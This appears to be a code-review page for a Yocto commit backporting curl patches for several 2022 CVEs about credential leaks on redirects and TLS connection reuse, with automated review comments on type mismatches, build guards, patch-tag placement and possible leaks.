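+From 5c2f3b3a5f115625134669d90d591de9c5aafc8e Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 16:24:33 +0200
+Subject: [PATCH] transfer: redirects to other protocols or ports clear auth
+
+... unless explicitly permitted.
+
+Bug: https://curl.se/docs/CVE-2022-27774.html
+Reported-by: Harry Sintonen
+Closes #8748
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/620ea21410030a9977396b4661806bc187231b79]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/transfer.c | 49 ++++++++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 48 insertions(+), 1 deletion(-)
+
+diff --git a/lib/transfer.c b/lib/transfer.c
+index 744e1c0..ac69d27 100644
+--- a/lib/transfer.c
++++ b/lib/transfer.c
+@@ -1627,10 +1627,57 @@ CURLcode Curl_follow(struct Curl_easy *data,
+ return CURLE_OUT_OF_MEMORY;
+ }
+ else {
+-
+ uc = curl_url_get(data->state.uh, CURLUPART_URL, &newurl, 0);
+ if(uc)
+ return Curl_uc_to_curlcode(uc);
++
++ /* Clear auth if this redirects to a different port number or protocol,
++ unless permitted */
++ if(!data->set.allow_auth_to_other_hosts && (type != FOLLOW_FAKE)) {
++ char *portnum;
++ int port;
++ bool clear = FALSE;
++
++ if(data->set.use_port && data->state.allow_port)
++ /* a custom port is used */
++ port = (int)data->set.use_port;
++ else {
++ uc = curl_url_get(data->state.uh, CURLUPART_PORT, &portnum,
++ CURLU_DEFAULT_PORT);
++ if(uc) {
++ free(newurl);
++ return Curl_uc_to_curlcode(uc);
++ }
++ port = atoi(portnum);
++ free(portnum);
++ }
++ if(port != data->info.conn_remote_port) {
++ infof(data, "Clear auth, redirects to port from %u to %u",
++ data->info.conn_remote_port, port);
++ clear = TRUE;
++ }
++ else {
++ char *scheme;
++ const struct Curl_handler *p;
++ uc = curl_url_get(data->state.uh, CURLUPART_SCHEME, &scheme, 0);
++ if(uc) {
++ free(newurl);
++ return Curl_uc_to_curlcode(uc);
++ }
++
++ p = Curl_builtin_scheme(scheme);
++ if(p && (p->protocol != data->info.conn_protocol)) {
++ infof(data, "Clear auth, redirects scheme from %s to %s",
++ data->info.conn_scheme, scheme);
++ clear = TRUE;
++ }
++ free(scheme);
++ }
++ if(clear) {
++ Curl_safefree(data->set.str[STRING_USERNAME]);
++ Curl_safefree(data->set.str[STRING_PASSWORD]);
++ }
++ }
+ }
+
+ if(type == FOLLOW_FAKE) {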
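Review bot: The first `infof()` in the lib/transfer.c hunk formats `data->info.conn_remote_port` with `%u`, but CVE-2022-27774-1.patch declares that field as `long conn_remote_port`, and `port` is an `int`. Passing a `long` for `%u` is a type mismatch in a varargs call. `infof(data, "Clear auth, redirects to port from %ld to %d", data->info.conn_remote_port, port);` matches the declared types. The mismatch appears to come from this backport keeping the port fields as `long`, so it is worth checking against the upstream field type before changing it. `Curl_follow()` starts and ends outside the hunk.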
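--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-3.patch
@@ -0,0 +1,83 @@
+From 5dccf21ad49eed925e8f76b0cb844877239ce23d Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 17:59:15 +0200
+Subject: [PATCH] openssl: don't leak the SRP credentials in redirects either
+
+Follow-up to 620ea21410030
+
+Reported-by: Harry Sintonen
+Closes #8751
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/139a54ed0a172adaaf1a78d6f4fff50b2c3f9e08]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/http.c | 10 +++++-----
+ lib/http.h | 6 ++++++
+ lib/vtls/openssl.c | 3 ++-
+ 3 files changed, 13 insertions(+), 6 deletions(-)
+
+diff --git a/lib/http.c b/lib/http.c
+index 8b16c09..5291c07 100644
+--- a/lib/http.c
++++ b/lib/http.c
+@@ -732,10 +732,10 @@ output_auth_headers(struct connectdata *conn,
+ }
+
+ /*
+- * allow_auth_to_host() tells if autentication, cookies or other "sensitive
+- * data" can (still) be sent to this host.
++ * Curl_allow_auth_to_host() tells if authentication, cookies or other
++ * "sensitive data" can (still) be sent to this host.
+ */
+-static bool allow_auth_to_host(struct Curl_easy *data)
++bool Curl_allow_auth_to_host(struct Curl_easy *data)
+ {
+ struct connectdata *conn = data->conn;
+ return (!data->state.this_is_a_follow ||
+@@ -816,7 +816,7 @@ Curl_http_output_auth(struct connectdata *conn,
+
+ /* To prevent the user+password to get sent to other than the original host
+ due to a location-follow */
+- if(allow_auth_to_host(data)
++ if(Curl_allow_auth_to_host(data)
+ || conn->bits.netrc
+ )
+ result = output_auth_headers(conn, authhost, request, path, FALSE);
+@@ -1891,7 +1891,7 @@ CURLcode Curl_add_custom_headers(struct connectdata *conn,
+ checkprefix("Cookie:", compare)) &&
+ /* be careful of sending this potentially sensitive header to
+ other hosts */
+- !allow_auth_to_host(data))
++ !Curl_allow_auth_to_host(data))
+ ;
+ else {
+ result = Curl_add_bufferf(&req_buffer, "%s\r\n", compare);
+diff --git a/lib/http.h b/lib/http.h
+index 4c1825f..4fbae1d 100644
+--- a/lib/http.h
++++ b/lib/http.h
+@@ -273,4 +273,10 @@ Curl_http_output_auth(struct connectdata *conn,
+ bool proxytunnel); /* TRUE if this is the request setting
+ up the proxy tunnel */
+
++/*
++ * Curl_allow_auth_to_host() tells if authentication, cookies or other
++ * "sensitive data" can (still) be sent to this host.
++ */
++bool Curl_allow_auth_to_host(struct Curl_easy *data);
++
+ #endif /* HEADER_CURL_HTTP_H */
+diff --git a/lib/vtls/openssl.c b/lib/vtls/openssl.c
+index 006a8c8..a14cecc 100644
+--- a/lib/vtls/openssl.c
++++ b/lib/vtls/openssl.c
+@@ -2739,7 +2739,8 @@ static CURLcode ossl_connect_step1(struct connectdata *conn, int sockindex)
+ #endif
+
+ #ifdef USE_TLS_SRP
+- if(ssl_authtype == CURL_TLSAUTH_SRP) {
++ if((ssl_authtype == CURL_TLSAUTH_SRP) &&
++ Curl_allow_auth_to_host(data)) {
+ char * const ssl_username = SSL_SET_OPTION(username);
+
+ infof(data, "Using TLS-SRP username: %s\n", ssl_username);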
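Review bot: `Curl_allow_auth_to_host()` stays defined in lib/http.c but is now called from lib/vtls/openssl.c, so its definition has to be compiled in every configuration that builds the TLS-SRP branch. The http.c hunk shows only the function itself; if it sits inside an HTTP-only preprocessor block (for example one keyed on `CURL_DISABLE_HTTP`), a build with that option set and `USE_TLS_SRP` enabled would fail at link time. It is worth checking the surrounding `#if` lines in this curl version and, if needed, moving the definition outside the guard. The http.c hunks also remove `allow_auth_to_host()` as added by CVE-2022-27776.patch, so this patch has to be applied after that one in the recipe.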
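--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27774-4.patch
@@ -0,0 +1,35 @@
+From 7395752e2f7b87dc8c8f2a7137075e2da554aaea Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Tue, 26 Apr 2022 07:46:19 +0200
+Subject: [PATCH] gnutls: don't leak the SRP credentials in redirects
+
+Follow-up to 620ea21410030 and 139a54ed0a172a
+
+Reported-by: Harry Sintonen
+Closes #8752
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/093531556203decd92d92bccd431edbe5561781c]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/vtls/gtls.c | 6 +++---
+ 1 file changed, 3 insertions(+), 3 deletions(-)
+
+diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
+index 8c05102..3d0758d 100644
+--- a/lib/vtls/gtls.c
++++ b/lib/vtls/gtls.c
+@@ -581,11 +581,11 @@ gtls_connect_step1(struct connectdata *conn,
+ }
+
+ #ifdef USE_TLS_SRP
+- if(SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) {
++ if((SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) &&
++ Curl_allow_auth_to_host(data)) {
+ infof(data, "Using TLS-SRP username: %s\n", SSL_SET_OPTION(username));
+
+- rc = gnutls_srp_allocate_client_credentials(
+- &BACKEND->srp_client_cred);
++ rc = gnutls_srp_allocate_client_credentials(&BACKEND->srp_client_cred);
+ if(rc != GNUTLS_E_SUCCESS) {
+ failf(data, "gnutls_srp_allocate_client_cred() failed: %s",
+ gnutls_strerror(rc));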
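Review bot: Only the allocation of the SRP client credentials is made conditional on `Curl_allow_auth_to_host(data)` here; the later uses in the same file are not. The gtls.c hunks of CVE-2022-27782-1.patch further down this page show `gnutls_credentials_set(session, GNUTLS_CRD_SRP, BACKEND->srp_client_cred)` and `gnutls_srp_free_client_credentials(BACKEND->srp_client_cred)` still guarded by the auth type (and username) alone, so on a redirect where auth is withheld they would run on a credential object that was never allocated. Whether that is harmless depends on how `srp_client_cred` is initialised, which is outside the hunks; if it is not guaranteed to be NULL-safe, those two sites should carry the same `&& Curl_allow_auth_to_host(data)` condition or test the pointer first. `gtls_connect_step1` begins and ends outside this hunk.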
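--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27775.patch
@@ -0,0 +1,39 @@
+From 058f98dc3fe595f21dc26a5b9b1699e519ba5705 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 25 Apr 2022 11:48:00 +0200
+Subject: [PATCH] conncache: include the zone id in the "bundle" hashkey
+
+Make connections to two separate IPv6 zone ids create separate
+connections.
+
+Reported-by: Harry Sintonen
+Bug: https://curl.se/docs/CVE-2022-27775.html
+Closes #8747
+---
+ lib/conncache.c | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+CVE: CVE-2022-27775
+Upstream-Status: Backport [https://github.com/curl/curl/commit/058f98dc3fe595f21dc26a5b9b1699e519ba5705.patch]
+Comment: Refreshed patch
+Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
+
+diff --git a/lib/conncache.c b/lib/conncache.c
+index ec669b971dc3..8948b53fa500 100644
+--- a/lib/conncache.c
++++ b/lib/conncache.c
+@@ -156,8 +156,12 @@
+ /* report back which name we used */
+ *hostp = hostname;
+
+- /* put the number first so that the hostname gets cut off if too long */
+- msnprintf(buf, len, "%ld%s", port, hostname);
++ /* put the numbers first so that the hostname gets cut off if too long */
++#ifdef ENABLE_IPV6
++ msnprintf(buf, len, "%u/%ld/%s", conn->scope_id, port, hostname);
++#else
++ msnprintf(buf, len, "%ld/%s", port, hostname);
++#endif
+ }
+
+ /* Returns number of connections currently held in the connection cache.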
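Review bot: The `CVE:`, `Upstream-Status:` and `Signed-off-by:` tags are placed after the `---` separator and diffstat rather than in the commit message above it; CVE-2022-27776.patch in this commit does the same. Text below `---` is not part of the commit message, so it is lost if the patch is later applied with `git am` and regenerated during a refresh. Moving the tag lines (and the `Comment:` line) above `---`, as the other curl patches visible on this page do for `Upstream-Status:` and `Signed-off-by:`, keeps the CVE attribution attached to the fix.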
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27776.patch b/meta/recipes-support/curl/curl/CVE-2022-27776.patch
new file mode 100644
index 0000000000..1a13df2d95
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27776.patch
@@ -0,0 +1,114 @@
1From 6e659993952aa5f90f48864be84a1bbb047fc258 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Mon, 25 Apr 2022 13:05:40 +0200
4Subject: [PATCH] http: avoid auth/cookie on redirects same host diff port
5
6CVE-2022-27776
7
8Reported-by: Harry Sintonen
9Bug: https://curl.se/docs/CVE-2022-27776.html
10Closes #8749
11---
12 lib/http.c | 34 ++++++++++++++++++++++------------
13 lib/urldata.h | 16 +++++++++-------
14 2 files changed, 31 insertions(+), 19 deletions(-)
15
16CVE: CVE-2022-27776
17Upstream-Status: Backport [https://github.com/curl/curl/commit/6e659993952aa5f90f48864be84a1bbb047fc258.patch]
18Comment: Refreshed patch
19Signed-off-by: Sana.Kazi <Sana.Kazi@kpit.com>
20
21diff --git a/lib/http.c b/lib/http.c
22index ce79fc4e31c8..f0476f3b9272 100644
23--- a/lib/http.c
24+++ b/lib/http.c
25@@ -731,6 +731,21 @@
26 return CURLE_OK;
27 }
28
29+/*
30+ * allow_auth_to_host() tells if autentication, cookies or other "sensitive
31+ * data" can (still) be sent to this host.
32+ */
33+static bool allow_auth_to_host(struct Curl_easy *data)
34+{
35+ struct connectdata *conn = data->conn;
36+ return (!data->state.this_is_a_follow ||
37+ data->set.allow_auth_to_other_hosts ||
38+ (data->state.first_host &&
39+ strcasecompare(data->state.first_host, conn->host.name) &&
40+ (data->state.first_remote_port == conn->remote_port) &&
41+ (data->state.first_remote_protocol == conn->handler->protocol)));
42+}
43+
44 /**
45 * Curl_http_output_auth() setups the authentication headers for the
46 * host/proxy and the correct authentication
47@@ -799,15 +799,12 @@
48 with it */
49 authproxy->done = TRUE;
50
51- /* To prevent the user+password to get sent to other than the original
52- host due to a location-follow, we do some weirdo checks here */
53- if(!data->state.this_is_a_follow ||
54- conn->bits.netrc ||
55- !data->state.first_host ||
56- data->set.allow_auth_to_other_hosts ||
57- strcasecompare(data->state.first_host, conn->host.name)) {
58+ /* To prevent the user+password to get sent to other than the original host
59+ due to a location-follow */
60+ if(allow_auth_to_host(data)
61+ || conn->bits.netrc
62+ )
63 result = output_auth_headers(conn, authhost, request, path, FALSE);
64- }
65 else
66 authhost->done = TRUE;
67
68@@ -1879,10 +1891,7 @@
69 checkprefix("Cookie:", compare)) &&
70 /* be careful of sending this potentially sensitive header to
71 other hosts */
72- (data->state.this_is_a_follow &&
73- data->state.first_host &&
74- !data->set.allow_auth_to_other_hosts &&
75- !strcasecompare(data->state.first_host, conn->host.name)))
76+ !allow_auth_to_host(data))
77 ;
78 else {
79 result = Curl_add_bufferf(&req_buffer, "%s\r\n", compare);
80@@ -2065,6 +2074,7 @@
81 return CURLE_OUT_OF_MEMORY;
82
83 data->state.first_remote_port = conn->remote_port;
84+ data->state.first_remote_protocol = conn->handler->protocol;
85 }
86
87 if((conn->handler->protocol&(PROTO_FAMILY_HTTP|CURLPROTO_FTP)) &&
88diff --git a/lib/urldata.h b/lib/urldata.h
89index 1d89b8d7fa68..ef2174d9e727 100644
90--- a/lib/urldata.h
91+++ b/lib/urldata.h
92@@ -1342,13 +1342,15 @@
93 char *ulbuf; /* allocated upload buffer or NULL */
94 curl_off_t current_speed; /* the ProgressShow() function sets this,
95 bytes / second */
96- char *first_host; /* host name of the first (not followed) request.
97- if set, this should be the host name that we will
98- sent authorization to, no else. Used to make Location:
99- following not keep sending user+password... This is
100- strdup() data.
101- */
102- int first_remote_port; /* remote port of the first (not followed) request */
103+
104+ /* host name, port number and protocol of the first (not followed) request.
105+ if set, this should be the host name that we will sent authorization to,
106+ no else. Used to make Location: following not keep sending user+password.
107+ This is strdup()ed data. */
108+ char *first_host;
109+ int first_remote_port;
110+ unsigned int first_remote_protocol;
111+
112 struct curl_ssl_session *session; /* array of 'max_ssl_sessions' size */
113 long sessionage; /* number of the most recent session */
114 unsigned int tempcount; /* number of entries in use in tempwrite, 0 - 3 */
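Review bot: In the `Curl_http_output_auth()` hunk the new condition `allow_auth_to_host(data) || conn->bits.netrc` keeps netrc as an unconditional bypass of the host, port and protocol comparison, and the comment above it does not say why. Someone auditing the redirect path cannot tell from the hunk whether netrc credentials are re-resolved for the redirect target or carried over from the first request. If they are looked up per host, a comment such as `/* netrc credentials are looked up for the current host, so they are exempt from the first-host check */` would document that; if not, the bypass deserves the same restriction. The function body continues outside the hunk.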
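--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27781.patch
@@ -0,0 +1,46 @@
+From 7a1f183039a6a6c9099a114f5e5c94777413c767 Mon Sep 17 00:00:00 2001
+From: Daniel Stenberg <daniel@haxx.se>
+Date: Mon, 9 May 2022 10:07:15 +0200
+Subject: [PATCH] nss: return error if seemingly stuck in a cert loop
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+CVE-2022-27781
+
+Reported-by: Florian Kohnhäuser
+Bug: https://curl.se/docs/CVE-2022-27781.html
+Closes #8822
+
+Upstream-Status: Backport [https://github.com/curl/curl/commit/5c7da89d404bf59c8dd82a001119a16d18365917]
+Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
+---
+ lib/vtls/nss.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/lib/vtls/nss.c b/lib/vtls/nss.c
+index 375c78b..86102f7 100644
+--- a/lib/vtls/nss.c
++++ b/lib/vtls/nss.c
+@@ -950,6 +950,9 @@ static void display_cert_info(struct Curl_easy *data,
+ PR_Free(common_name);
+ }
+
++/* A number of certs that will never occur in a real server handshake */
++#define TOO_MANY_CERTS 300
++
+ static CURLcode display_conn_info(struct connectdata *conn, PRFileDesc *sock)
+ {
+ CURLcode result = CURLE_OK;
+@@ -986,6 +989,11 @@ static CURLcode display_conn_info(struct connectdata *conn, PRFileDesc *sock)
+ cert2 = CERT_FindCertIssuer(cert, now, certUsageSSLCA);
+ while(cert2) {
+ i++;
++ if(i >= TOO_MANY_CERTS) {
++ CERT_DestroyCertificate(cert2);
++ failf(data, "certificate loop");
++ return CURLE_SSL_CERTPROBLEM;
++ }
+ if(cert2->isRoot) {
+ CERT_DestroyCertificate(cert2);
+ break;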
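Review bot: The new early return in `display_conn_info()` releases `cert2` but not `cert`, the certificate passed to `CERT_FindCertIssuer()` just above the loop. How `cert` is obtained and released is outside the hunk; if this function owns that reference, the `certificate loop` path leaks it each time a handshake is rejected. Adding `CERT_DestroyCertificate(cert);` before `return CURLE_SSL_CERTPROBLEM;` would close that, assuming the normal path releases `cert` after the loop.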
diff --git a/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch b/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch
new file mode 100644
index 0000000000..6b6d0e1938
--- /dev/null
+++ b/meta/recipes-support/curl/curl/CVE-2022-27782-1.patch
@@ -0,0 +1,363 @@
1From 907a16c832d9ce0ffa7e9b2297548063095a7242 Mon Sep 17 00:00:00 2001
2From: Daniel Stenberg <daniel@haxx.se>
3Date: Mon, 9 May 2022 23:13:53 +0200
4Subject: [PATCH] tls: check more TLS details for connection reuse
5
6CVE-2022-27782
7
8Reported-by: Harry Sintonen
9Bug: https://curl.se/docs/CVE-2022-27782.html
10Closes #8825
11
12Upstream-Status: Backport [https://github.com/curl/curl/commit/f18af4f874cecab82a9797e8c7541e0990c7a64c]
13Signed-off-by: Robert Joslyn <robert.joslyn@redrectangle.org>
14---
15 lib/setopt.c | 29 +++++++++++++++++------------
16 lib/url.c | 17 ++++++++++-------
17 lib/urldata.h | 13 +++++++------
18 lib/vtls/gtls.c | 30 ++++++++++++++++--------------
19 lib/vtls/mbedtls.c | 2 +-
20 lib/vtls/nss.c | 6 +++---
21 lib/vtls/openssl.c | 10 +++++-----
22 lib/vtls/vtls.c | 1 +
23 8 files changed, 60 insertions(+), 48 deletions(-)
24
25diff --git a/lib/setopt.c b/lib/setopt.c
26index 4648c87..bebb2e4 100644
27--- a/lib/setopt.c
28+++ b/lib/setopt.c
29@@ -2130,6 +2130,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
30
31 case CURLOPT_SSL_OPTIONS:
32 arg = va_arg(param, long);
33+ data->set.ssl.primary.ssl_options = (unsigned char)(arg & 0xff);
34 data->set.ssl.enable_beast =
35 (bool)((arg&CURLSSLOPT_ALLOW_BEAST) ? TRUE : FALSE);
36 data->set.ssl.no_revoke = !!(arg & CURLSSLOPT_NO_REVOKE);
37@@ -2139,6 +2140,7 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
38 #ifndef CURL_DISABLE_PROXY
39 case CURLOPT_PROXY_SSL_OPTIONS:
40 arg = va_arg(param, long);
41+ data->set.proxy_ssl.primary.ssl_options = (unsigned char)(arg & 0xff);
42 data->set.proxy_ssl.enable_beast =
43 (bool)((arg&CURLSSLOPT_ALLOW_BEAST) ? TRUE : FALSE);
44 data->set.proxy_ssl.no_revoke = !!(arg & CURLSSLOPT_NO_REVOKE);
45@@ -2541,44 +2543,47 @@ CURLcode Curl_vsetopt(struct Curl_easy *data, CURLoption option, va_list param)
46 case CURLOPT_TLSAUTH_USERNAME:
47 result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_USERNAME_ORIG],
48 va_arg(param, char *));
49- if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] && !data->set.ssl.authtype)
50- data->set.ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
51+ if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] &&
52+ !data->set.ssl.primary.authtype)
53+ data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
54 break;
55 case CURLOPT_PROXY_TLSAUTH_USERNAME:
56 result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_USERNAME_PROXY],
57 va_arg(param, char *));
58 if(data->set.str[STRING_TLSAUTH_USERNAME_PROXY] &&
59- !data->set.proxy_ssl.authtype)
60- data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
61+ !data->set.proxy_ssl.primary.authtype)
62+ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to
63+ SRP */
64 break;
65 case CURLOPT_TLSAUTH_PASSWORD:
66 result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_PASSWORD_ORIG],
67 va_arg(param, char *));
68- if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] && !data->set.ssl.authtype)
69- data->set.ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
70+ if(data->set.str[STRING_TLSAUTH_USERNAME_ORIG] &&
71+ !data->set.ssl.primary.authtype)
72+ data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
73 break;
74 case CURLOPT_PROXY_TLSAUTH_PASSWORD:
75 result = Curl_setstropt(&data->set.str[STRING_TLSAUTH_PASSWORD_PROXY],
76 va_arg(param, char *));
77 if(data->set.str[STRING_TLSAUTH_USERNAME_PROXY] &&
78- !data->set.proxy_ssl.authtype)
79- data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP; /* default to SRP */
80+ !data->set.proxy_ssl.primary.authtype)
81+ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP; /* default */
82 break;
83 case CURLOPT_TLSAUTH_TYPE:
84 argptr = va_arg(param, char *);
85 if(!argptr ||
86 strncasecompare(argptr, "SRP", strlen("SRP")))
87- data->set.ssl.authtype = CURL_TLSAUTH_SRP;
88+ data->set.ssl.primary.authtype = CURL_TLSAUTH_SRP;
89 else
90- data->set.ssl.authtype = CURL_TLSAUTH_NONE;
91+ data->set.ssl.primary.authtype = CURL_TLSAUTH_NONE;
92 break;
93 case CURLOPT_PROXY_TLSAUTH_TYPE:
94 argptr = va_arg(param, char *);
95 if(!argptr ||
96 strncasecompare(argptr, "SRP", strlen("SRP")))
97- data->set.proxy_ssl.authtype = CURL_TLSAUTH_SRP;
98+ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_SRP;
99 else
100- data->set.proxy_ssl.authtype = CURL_TLSAUTH_NONE;
101+ data->set.proxy_ssl.primary.authtype = CURL_TLSAUTH_NONE;
102 break;
103 #endif
104 #ifdef USE_ARES
105diff --git a/lib/url.c b/lib/url.c
106index efa3dc7..6518be9 100644
107--- a/lib/url.c
108+++ b/lib/url.c
109@@ -482,7 +482,7 @@ CURLcode Curl_init_userdefined(struct Curl_easy *data)
110 set->ssl.primary.verifypeer = TRUE;
111 set->ssl.primary.verifyhost = TRUE;
112 #ifdef USE_TLS_SRP
113- set->ssl.authtype = CURL_TLSAUTH_NONE;
114+ set->ssl.primary.authtype = CURL_TLSAUTH_NONE;
115 #endif
116 set->ssh_auth_types = CURLSSH_AUTH_DEFAULT; /* defaults to any auth
117 type */
118@@ -3594,8 +3594,9 @@ static CURLcode create_conn(struct Curl_easy *data,
119 data->set.proxy_ssl.primary.pinned_key =
120 data->set.str[STRING_SSL_PINNEDPUBLICKEY_PROXY];
121
122- data->set.ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
123- data->set.proxy_ssl.CRLfile = data->set.str[STRING_SSL_CRLFILE_PROXY];
124+ data->set.ssl.primary.CRLfile = data->set.str[STRING_SSL_CRLFILE_ORIG];
125+ data->set.proxy_ssl.primary.CRLfile =
126+ data->set.str[STRING_SSL_CRLFILE_PROXY];
127 data->set.ssl.cert = data->set.str[STRING_CERT_ORIG];
128 data->set.proxy_ssl.cert = data->set.str[STRING_CERT_PROXY];
129 data->set.ssl.cert_type = data->set.str[STRING_CERT_TYPE_ORIG];
130@@ -3609,10 +3610,12 @@ static CURLcode create_conn(struct Curl_easy *data,
131 data->set.ssl.primary.clientcert = data->set.str[STRING_CERT_ORIG];
132 data->set.proxy_ssl.primary.clientcert = data->set.str[STRING_CERT_PROXY];
133 #ifdef USE_TLS_SRP
134- data->set.ssl.username = data->set.str[STRING_TLSAUTH_USERNAME_ORIG];
135- data->set.proxy_ssl.username = data->set.str[STRING_TLSAUTH_USERNAME_PROXY];
136- data->set.ssl.password = data->set.str[STRING_TLSAUTH_PASSWORD_ORIG];
137- data->set.proxy_ssl.password = data->set.str[STRING_TLSAUTH_PASSWORD_PROXY];
138+ data->set.ssl.primary.username = data->set.str[STRING_TLSAUTH_USERNAME_ORIG];
139+ data->set.proxy_ssl.primary.username =
140+ data->set.str[STRING_TLSAUTH_USERNAME_PROXY];
141+ data->set.ssl.primary.password = data->set.str[STRING_TLSAUTH_PASSWORD_ORIG];
142+ data->set.proxy_ssl.primary.password =
143+ data->set.str[STRING_TLSAUTH_PASSWORD_PROXY];
144 #endif
145
146 if(!Curl_clone_primary_ssl_config(&data->set.ssl.primary,
147diff --git a/lib/urldata.h b/lib/urldata.h
148index ab1b267..ad0ef8f 100644
149--- a/lib/urldata.h
150+++ b/lib/urldata.h
151@@ -231,6 +231,13 @@ struct ssl_primary_config {
152 char *cipher_list; /* list of ciphers to use */
153 char *cipher_list13; /* list of TLS 1.3 cipher suites to use */
154 char *pinned_key;
155+ char *CRLfile; /* CRL to check certificate revocation */
156+ #ifdef USE_TLS_SRP
157+ char *username; /* TLS username (for, e.g., SRP) */
158+ char *password; /* TLS password (for, e.g., SRP) */
159+ enum CURL_TLSAUTH authtype; /* TLS authentication type (default SRP) */
160+ #endif
161+ unsigned char ssl_options; /* the CURLOPT_SSL_OPTIONS bitmask */
162 BIT(verifypeer); /* set TRUE if this is desired */
163 BIT(verifyhost); /* set TRUE if CN/SAN must match hostname */
164 BIT(verifystatus); /* set TRUE if certificate status must be checked */
165@@ -240,7 +247,6 @@ struct ssl_primary_config {
166 struct ssl_config_data {
167 struct ssl_primary_config primary;
168 long certverifyresult; /* result from the certificate verification */
169- char *CRLfile; /* CRL to check certificate revocation */
170 curl_ssl_ctx_callback fsslctx; /* function to initialize ssl ctx */
171 void *fsslctxp; /* parameter for call back */
172 char *cert; /* client certificate file name */
173@@ -248,11 +254,6 @@ struct ssl_config_data {
174 char *key; /* private key file name */
175 char *key_type; /* format for private key (default: PEM) */
176 char *key_passwd; /* plain text private key password */
177-#ifdef USE_TLS_SRP
178- char *username; /* TLS username (for, e.g., SRP) */
179- char *password; /* TLS password (for, e.g., SRP) */
180- enum CURL_TLSAUTH authtype; /* TLS authentication type (default SRP) */
181-#endif
182 BIT(certinfo); /* gather lots of certificate info */
183 BIT(falsestart);
184 BIT(enable_beast); /* allow this flaw for interoperability's sake*/
185diff --git a/lib/vtls/gtls.c b/lib/vtls/gtls.c
186index 3d0758d..92c301c 100644
187--- a/lib/vtls/gtls.c
188+++ b/lib/vtls/gtls.c
189@@ -581,9 +581,10 @@ gtls_connect_step1(struct connectdata *conn,
190 }
191
192 #ifdef USE_TLS_SRP
193- if((SSL_SET_OPTION(authtype) == CURL_TLSAUTH_SRP) &&
194+ if((SSL_SET_OPTION(primary.authtype) == CURL_TLSAUTH_SRP) &&
195 Curl_allow_auth_to_host(data)) {
196- infof(data, "Using TLS-SRP username: %s\n", SSL_SET_OPTION(username));
197+ infof(data, "Using TLS-SRP username: %s\n",
198+ SSL_SET_OPTION(primary.username));
199
200 rc = gnutls_srp_allocate_client_credentials(&BACKEND->srp_client_cred);
201 if(rc != GNUTLS_E_SUCCESS) {
202@@ -593,8 +594,8 @@ gtls_connect_step1(struct connectdata *conn,
203 }
204
205 rc = gnutls_srp_set_client_credentials(BACKEND->srp_client_cred,
206- SSL_SET_OPTION(username),
207- SSL_SET_OPTION(password));
208+ SSL_SET_OPTION(primary.username),
209+ SSL_SET_OPTION(primary.password));
210 if(rc != GNUTLS_E_SUCCESS) {
211 failf(data, "gnutls_srp_set_client_cred() failed: %s",
212 gnutls_strerror(rc));
213@@ -648,19 +649,19 @@ gtls_connect_step1(struct connectdata *conn,
214 }
215 #endif
216
217- if(SSL_SET_OPTION(CRLfile)) {
218+ if(SSL_SET_OPTION(primary.CRLfile)) {
219 /* set the CRL list file */
220 rc = gnutls_certificate_set_x509_crl_file(BACKEND->cred,
221- SSL_SET_OPTION(CRLfile),
222+ SSL_SET_OPTION(primary.CRLfile),
223 GNUTLS_X509_FMT_PEM);
224 if(rc < 0) {
225 failf(data, "error reading crl file %s (%s)",
226- SSL_SET_OPTION(CRLfile), gnutls_strerror(rc));
227+ SSL_SET_OPTION(primary.CRLfile), gnutls_strerror(rc));
228 return CURLE_SSL_CRL_BADFILE;
229 }
230 else
231 infof(data, "found %d CRL in %s\n",
232- rc, SSL_SET_OPTION(CRLfile));
233+ rc, SSL_SET_OPTION(primary.CRLfile));
234 }
